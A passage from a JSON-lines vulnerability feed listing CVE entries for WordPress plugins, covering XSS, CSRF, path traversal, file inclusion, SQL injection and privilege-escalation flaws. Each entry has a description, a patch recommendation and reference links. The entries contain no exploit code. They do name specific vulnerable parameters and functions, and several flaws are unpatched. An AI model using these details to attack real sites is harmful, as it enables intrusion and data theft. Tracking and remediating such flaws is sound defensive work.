"}
{"CVE_ID":"CVE-2024-23517","slug":"calendar-booking","versionImpact":"3.5.10","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Start Booking Scheduling Plugin \u2013 Online Booking for WordPress allows Stored XSS. This issue affects Scheduling Plugin \u2013 Online Booking for WordPress: from n\/a through 3.5.10.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/calendar-booking\\\/wordpress-scheduling-plugin-online-booking-for-wordpress-plugin-3-5-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/calendar-booking\\\/wordpress-scheduling-plugin-online-booking-for-wordpress-plugin-3-5-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3582","slug":"ungallery","versionImpact":"2.2.4","description":"The UnGallery WordPress plugin through 2.2.4 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a348b5d-13aa-40c3-9d21-0554683f8019\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a348b5d-13aa-40c3-9d21-0554683f8019\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4426","slug":"comparison-slider","versionImpact":"1.0.5","description":"The Comparison Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.5. This is due to missing or incorrect nonce validation on several functions hooked to AJAX actions. This makes it possible for unauthenticated attackers to change slider titles, delete sliders and modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a9b284a-2af9-4d20-9663-a40b9330da35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a9b284a-2af9-4d20-9663-a40b9330da35?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/comparison-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/comparison-slider\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4751","slug":"wp-prayers-request","versionImpact":"2.4.7","description":"The WP Prayer II WordPress plugin through 2.4.7 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/94f4cc45-4c55-43d4-8ad2-a20c118b589f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/94f4cc45-4c55-43d4-8ad2-a20c118b589f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5992","slug":"cliengo","versionImpact":"3.0.1","description":"The Cliengo \u2013 Chatbot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_chatbot_token' and 'update_chatbot_position' functions in all versions up to, and including, 3.0.1. This makes it possible for unauthenticated attackers to change chatbot settings, which can lead to unavailability or other changes to the chatbot.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7f0afe8-234a-4c3f-87c8-f3f23ac94fe3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7f0afe8-234a-4c3f-87c8-f3f23ac94fe3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cliengo\\\/trunk\\\/admin\\\/class-cliengo-form.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cliengo\\\/trunk\\\/admin\\\/class-cliengo-form.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cliengo\\\/trunk\\\/admin\\\/class-cliengo-form.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cliengo\\\/trunk\\\/admin\\\/class-cliengo-form.php#L99\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6518","slug":"fluentform","versionImpact":"5.1.19","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66ca9c39-1ba0-4208-ae35-d2c3c9ea4eb9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66ca9c39-1ba0-4208-ae35-d2c3c9ea4eb9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12219","slug":"stop-registration-spam","versionImpact":"1.23","description":"The Stop Registration Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.23. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206562\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206562\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stop-registration-spam\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stop-registration-spam\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d5fb4ac-f86e-4b5e-ad4b-be19158ab745?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d5fb4ac-f86e-4b5e-ad4b-be19158ab745?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11887","slug":"geo-targetly-geo-content","versionImpact":"6.0","description":"The Geo Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'geotargetlygeocontent' shortcode in all versions up to, and including, 6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-targetly-geo-content\\\/trunk\\\/geotargetly-geo-content.php#L157\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-targetly-geo-content\\\/trunk\\\/geotargetly-geo-content.php#L157\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/geo-targetly-geo-content\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/geo-targetly-geo-content\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c52cdb58-c97a-43a6-a3ff-be084ceee085?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c52cdb58-c97a-43a6-a3ff-be084ceee085?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13550","slug":"abc-notation","versionImpact":"6.1.3","description":"The ABC Notation plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 6.1.3 via the 'file' attribute of the 'abcjs' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/abc-notation\\\/tags\\\/6.1.3\\\/abc-notation.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/abc-notation\\\/tags\\\/6.1.3\\\/abc-notation.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e53a2b7a-7005-451a-88f2-c23d420b4aad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e53a2b7a-7005-451a-88f2-c23d420b4aad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13229","slug":"seo-by-rank-math","versionImpact":"1.0.235","description":"The Rank Math SEO \u2013 AI SEO Tools to Dominate SEO Rankings plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the update_metadata() function in all versions up to, and including, 1.0.235. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete any schema metadata assigned to any post.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L169\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L169\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222905\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222905\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/rankmath.com\\\/changelog\\\/free\\\/page\\\/2\\\/\",\"name\":\"https:\\\/\\\/rankmath.com\\\/changelog\\\/free\\\/page\\\/2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-by-rank-math\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-by-rank-math\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5776f689-56dd-413d-b02d-5551b97dd5eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5776f689-56dd-413d-b02d-5551b97dd5eb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13703","slug":"crm-customer-relationship-management-by-vcita","versionImpact":"2.7.1","description":"The CRM and Lead Management by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_ajax_toggle_ae() function in all versions up to, and including, 2.7.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enable and disable plugin widgets.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e8c2aa5-5770-4b88-b415-40c2aff69d84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e8c2aa5-5770-4b88-b415-40c2aff69d84?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3098","slug":"video-sidebar-widget","versionImpact":"1.0.0.3","description":"The Video Url plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.0.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-sidebar-widget\\\/tags\\\/1.0.0.3\\\/delete.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-sidebar-widget\\\/tags\\\/1.0.0.3\\\/delete.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-sidebar-widget\\\/tags\\\/1.0.0.3\\\/video_edit.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-sidebar-widget\\\/tags\\\/1.0.0.3\\\/video_edit.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/video-sidebar-widget\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/video-sidebar-widget\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/587e28ea-b3f4-4e40-a7d2-c6a01ac905bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/587e28ea-b3f4-4e40-a7d2-c6a01ac905bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6993","slug":"ultimate-wp-mail","description":"The Ultimate WP Mail plugin for WordPress is vulnerable to Privilege Escalation due to improper authorization within the get_email_log_details() AJAX handler in versions 1.0.17 to 1.3.6. The handler reads the client-supplied post_id and retrieves the corresponding email log post content (including the password-reset link), relying only on the \u2018edit_posts\u2019 capability without restricting to administrators or validating ownership. This makes it possible for authenticated attackers, with Contributor-level access and above, to harvest an admin\u2019s reset link and elevate their privileges to administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-wp-mail\\\/tags\\\/1.3.6\\\/includes\\\/Ajax.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-wp-mail\\\/tags\\\/1.3.6\\\/includes\\\/Ajax.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328277\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328277\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-wp-mail\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-wp-mail\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b19794de-b623-4017-bd91-73986383c58b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b19794de-b623-4017-bd91-73986383c58b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8393","slug":"woolook","versionImpact":"1.7.0","description":"The Woocommerce Blocks \u2013 Woolook plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.7.0 via the 'tab' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. Please note that this can also be exploited via CSRF techniques.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolook\\\/trunk\\\/includes\\\/views\\\/panel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolook\\\/trunk\\\/includes\\\/views\\\/panel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf3916fc-f652-4615-872c-3f007b8999df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf3916fc-f652-4615-872c-3f007b8999df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36727","slug":"newsletter-manager","versionImpact":"1.5.1","description":"The Newsletter Manager plugin for WordPress is vulnerable to insecure deserialization in versions up to, and including, 1.5.1. This is due to unsanitized input from the 'customFieldsDetails' parameter being passed through a deserialization function. This potentially makes it possible for unauthenticated attackers to inject a serialized PHP object.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b82124b1-e5e1-4f1e-9513-90474fd3f066\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b82124b1-e5e1-4f1e-9513-90474fd3f066\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcfd8c4d-d48b-468d-a7d5-1ec05b068f79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcfd8c4d-d48b-468d-a7d5-1ec05b068f79?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/insecure-deserialization-vulnerability-in-wordpress-newsletter-manager-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/insecure-deserialization-vulnerability-in-wordpress-newsletter-manager-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2353","slug":"chp-ads-block-detector","versionImpact":"3.9.4","description":"The CHP Ads Block Detector plugin for WordPress is vulnerable to unauthorized plugin settings update and reset due to a missing capability check on the chp_abd_action function in versions up to, and including, 3.9.4. This makes it possible for subscriber-level attackers to change or reset plugin settings. CVE-2023-36509 appears to be a duplicate of this issue.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2926660\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2926660\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920522\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920522\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eca64d7-6e33-4b8e-af37-a3e8bbf2b76f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eca64d7-6e33-4b8e-af37-a3e8bbf2b76f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922313\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922313\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48754","slug":"delete-post-revisions-on-single-click","versionImpact":"4.6","description":"Cross-Site Request Forgery (CSRF) vulnerability in Wap Nepal Delete Post Revisions In WordPress allows Cross Site Request Forgery.This issue affects Delete Post Revisions In WordPress: from n\/a through 4.6.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/delete-post-revisions-on-single-click\\\/wordpress-delete-post-revisions-in-wordpress-plugin-4-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/delete-post-revisions-on-single-click\\\/wordpress-delete-post-revisions-in-wordpress-plugin-4-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51404","slug":"myagileprivacy","versionImpact":"2.1.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MyAgilePrivacy My Agile Privacy \u2013 The only GDPR solution for WordPress that you can truly trust allows Stored XSS.This issue affects My Agile Privacy \u2013 The only GDPR solution for WordPress that you can truly trust: from n\/a through 2.1.7.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/myagileprivacy\\\/wordpress-my-agile-privacy-plugin-2-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/myagileprivacy\\\/wordpress-my-agile-privacy-plugin-2-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-33937","slug":"progressive-wp","versionImpact":"2.1.13","description":"Missing Authorization vulnerability in Nico Martin Progressive WordPress (PWA).This issue affects Progressive WordPress (PWA): from n\/a through 2.1.13.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/progressive-wp\\\/wordpress-progressive-wordpress-pwa-plugin-2-1-13-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/progressive-wp\\\/wordpress-progressive-wordpress-pwa-plugin-2-1-13-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4422","slug":"comparison-slider","versionImpact":"1.0.5","description":"The Comparison Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the slider title parameter in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0907c74e-0bb8-4761-aabf-79d880c78415?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0907c74e-0bb8-4761-aabf-79d880c78415?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/comparison-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/comparison-slider\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4480","slug":"wp-prayers-request","versionImpact":"2.4.7","description":"The WP Prayer II WordPress plugin through 2.4.7 does not have a CSRF check in place when updating its email settings, which could allow attackers to make a logged-in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1e5dee9-c540-4cc1-8b94-c6d1650b52d3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1e5dee9-c540-4cc1-8b94-c6d1650b52d3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5937","slug":"simple-alert-boxes","versionImpact":"1.4.0","description":"The Simple Alert Boxes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Alert shortcode in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a25ad405-a97e-4821-b57a-0f39d5ce5e70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a25ad405-a97e-4821-b57a-0f39d5ce5e70?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-alert-boxes\\\/trunk\\\/plugin.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-alert-boxes\\\/trunk\\\/plugin.php#L71\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43965","slug":"wp-sendgrid-mailer","versionImpact":"1.4","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Smackcoders SendGrid for WordPress allows SQL Injection.This issue affects SendGrid for WordPress: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-sendgrid-mailer\\\/wordpress-sendgrid-for-wordpress-plugin-1-4-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-sendgrid-mailer\\\/wordpress-sendgrid-for-wordpress-plugin-1-4-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11414","slug":"recipepress-reloaded","versionImpact":"2.12.0","description":"The RecipePress Reloaded plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Recipe Ingredients in all versions up to, and including, 2.12.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/recipepress-reloaded\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/recipepress-reloaded\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/193178a6-d566-4e0a-aa74-8d80a7c8ba04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/193178a6-d566-4e0a-aa74-8d80a7c8ba04?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11352","slug":"twentytwenty","versionImpact":"1.0.1","description":"The TwentyTwenty plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'twentytwenty' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 